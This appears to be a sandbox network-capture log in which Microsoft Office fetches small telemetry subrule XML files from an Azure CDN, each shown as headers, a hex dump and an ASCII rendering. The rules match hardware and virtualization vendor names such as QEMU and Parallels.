                                                                                                                                                      Content-Length: 411
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                      x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125925Z-1746fd949bd6ztf6hC1EWRvq2s00000000yg0000000032rz
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:25 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      87192.168.2.44985413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:25 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:25 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 427
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                      x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125925Z-1746fd949bd77mkmhC1EWR5efc00000001cg00000000brzb
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      88192.168.2.44985513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:27 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:27 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 502
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                      x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125927Z-1746fd949bdnq7x2hC1EWRpxr00000000110000000008dbe
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:27 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      89192.168.2.44985713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:27 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:27 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 474
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                      x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125927Z-1746fd949bddgsvjhC1EWRum2c00000001c000000000cvxx
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      90192.168.2.44985813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:27 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:27 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 408
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                      x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125927Z-1746fd949bdw2rg8hC1EWR11u400000001gg000000006g8y
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:27 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      91192.168.2.44985613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:27 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:27 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 407
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                      x-ms-request-id: 7057cc02-501e-008f-16cc-459054000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125927Z-1746fd949bddgsvjhC1EWRum2c00000001k0000000003urn
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:27 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      92192.168.2.44985013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:28 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      93192.168.2.44985913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:29 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:29 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 469
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                      x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125929Z-1746fd949bdb8xvchC1EWRmbd4000000011g00000000dh51
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:29 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      94192.168.2.44986013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:29 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:29 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 416
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                                      x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125929Z-1746fd949bdnq7x2hC1EWRpxr0000000014g0000000039kp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:29 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      95192.168.2.44986213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:29 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:29 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 432
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                      x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125929Z-1746fd949bdxk6n6hC1EWRdr8c000000015g000000001sw6
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:30 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      96192.168.2.44986313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:30 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:30 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 475
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                      x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125930Z-1746fd949bdnq7x2hC1EWRpxr000000000yg00000000c448
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:30 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      97192.168.2.44986113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:30 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
